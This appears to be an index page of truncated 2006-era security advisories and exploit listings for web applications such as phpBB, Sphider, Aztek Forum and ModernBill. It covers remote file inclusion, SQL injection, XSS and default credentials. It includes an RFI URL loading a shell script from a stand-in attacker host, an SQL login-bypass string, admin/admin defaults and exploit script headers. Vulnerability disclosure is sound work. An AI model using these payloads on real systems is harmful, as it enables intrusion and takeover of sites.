[Kurdish Secure Advisory #1] I-RATER Platinum "Admin/configsettings.tpl.php" Remote File Include Vulnerability
Website : http://www.i-rater.com Risk : High Class : Remote References : http://www.securityfocus.com/bid/17623 Credits : B3g0k,Nistiman,Flot,Netqurd and all my friend Remote Code : http://www.site.com/admin/configsettings.tpl.php?includepath=http://www.evilrox.com/cmd.txt?&cmd=id...
warforge.NEWS
warforge.NEWS exploit i've paste it on: http://forum.zone-h.org/viewtopic.php?t=5468 ------------------------------------------------------------------------ ------------------------------------------------------------------ - warforge.NEWS =1.00 Multiple Vulnerabilities - -=...
CVE-2006-2044
The CVE-2006-2044 entry concerns na-img-4.0.34.bin used by the IP3 Networks NetAccess NA75, which ships with a default username and password of admin/admin. The vulnerability is network‑accessible (AV:N, attack vector NETWORK) with no authentication required (Au:N) and yields partial impact to co...
Symantec Scan Engine 5.0.x - Change Admin Password
Symantec Scan Engine 5.0.x - Change Admin Password #!/usr/bin/perl -w Remotely change the administrator password or password hash of Symantec Scan Engine. Author: Marc Bevand of Rapid7 Copyright 2006 Rapid7, LLC. All rights reserved. Redistribution and use in source and binary forms, with or witho...
ModernBill multiple SQL inj. vuln.
ModernBill multiple SQL inj. vuln. Vuln. discovered by: r0t Date: 18 April 2006 vendor: www.moderngigabyte.com product link: www.moderngigabyte.net/modernbill/index.htm?ref=homeofmodernbill affected versions: 4.3.2 and previous original advisory:...
Sphider configset.php settings_dir Parameter Remote File Inclusion
The remote host is running Sphider, an open source web spider and search engine written in PHP. The version of Sphider installed on the remote host fails to sanitize user-supplied input to the 'settings_dir' parameter of the 'admin/configset.php' script before using it in a PHP 'include' function...
CVE-2006-1784
CVE-2006-1784 affects Sphider up to version 1.3. The issue is a PHP remote file inclusion in admin/configset.php via the settings_dir parameter, allowing arbitrary PHP code execution under specific PHP configurations (notably related to register_globals). The problem is triggered when user input ...
Remote file inclusion
PHP remote file inclusion vulnerability in Virtual War VWar 1.5.0 allows remote attackers to execute arbitrary PHP code via a URL in the vwarroot parameter to (1) admin/admin.php, (2) war.php, (3) stats.php, (4) news.php, (5) joinus.php, (6) challenge.php, (7) calendar.php, (8) member.php, (9) popup.php, and other...
phpBB <= 2.0.19 (user_sig_bbcode_uid) Remote Code Execution Exploit
No description provided by source. #!/usr/bin/perl r57phpbba2e2.pl - phpBB admin 2 exec exploit version 2 based on user_sig_bbcode_uid bug tested on 2.0.12 , 2.0.13 , 2.0.19 -------------------------------------------- screen r57phpbba2e2.pl -u http://192.168.0.2/phpBB-2.0.19/ -L admin -P password...
SiteMan <= All version SQL injection in admin_login.asp
Vendor : SiteMan Target Page : admin_login.asp Bug Finder : S3rv3rhack3r administrator panel demo: http://www.ispdemos.com/Demo/SiteMan/admin_login.asp WWW : http://www.ispofegypt.com/ you can login to admin_login.asp with user : admin pass : ' or '...
Code injection
Direct static code injection vulnerability in admin/config.php in vscripts (aka Kuba Kunkiewicz) VNews 1.2 allows remote authenticated administrators to execute code by inserting the code into variables that are stored in admin/config.php...
Aztek Forum 4.00 (myadmin.php) User Privilege Escalation Exploit
Exploit for unknown platform in category web applications ================================================================ Aztek Forum 4.00 myadmin.php User Privilege Escalation Exploit ================================================================ #!/usr/bin/perl use IO::Socket; Aztek Forum 4.0...
DVBBS7.1 SQL Edition cross-database vulnerability
Author: Gui brother article source: www.54nb.cn Vulnerability test environment: DVBBS7.1 SQL Affected files admin/admin.asp ..... Exploit select @@version0 to obtain the Windows version number and username='dbo' determine the current system user is not sa select username0 proof the current syste...
nodez 4.6.1.1 mercury - Multiple Vulnerabilities
#!/usr/bin/php -q -d short_open_tag=on <? echo "Nodez 4.6.1.1 Mercury possibly prior versions multiple vulnerabilities\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; / software: site: nodez.greentinted.com/ description: Nodez - "An open source conten...
Aztek Forum 4.00 - Cross-Site Scripting / SQL Injection
/==========================================/ // AZTEK forums 4.0 multiple vulnerabilities PoC // Product: AZTEK forums // URL: http://www.forum-aztek.com/ // RISK: high /==========================================/ PoC 1- XSS - Post a message including the following line:...
Remote file inclusion
PHP remote file include vulnerability in admin/index.php in Archangel Weblog 0.90.02 allows remote authenticated administrators to execute arbitrary PHP code via a URL ending in a NULL (%00) in the index parameter...
CVE-2006-0702
The provided connected Nessus entry confirms a concrete vulnerability in imageVue: versions prior to 16.2 allow unauthenticated remote upload of arbitrary files via admin/upload.php, effectively enabling code execution under the web server’s user context. The issue is described as an unrestricted...
MyBB-1.03.txt
Multiple Injections in MyBB 1.03 All injections and vulnerabilities discovered by : HACKERS PAL Two days ago I thought to download the new MyBB forum new version files .. and there was the disaster: there are many XSS and SQL injections in the new protected version ... and I made an exploit which g...
dbmanDefault.txt
Tunis the 31/jan/2006 bug found by Fireboy [email protected] Product affected:DBMan for Windows and Unix Product vendor: http://www.gossamer-threads.com the problem with DBman is default passwords these are default pass : admin/admin,author/author,guest/guest if the admin not change the pas...
[Full-disclosure] phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin
Original Source: http://securityreason.com/achievementsecurityalert/31 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin Author: Maksymilian Arciemowicz cXIb8O3 Date: 3.2.2006 from SecurityReason.Com CVE-2006-0437 for the XSS issues CVE-2006-0438...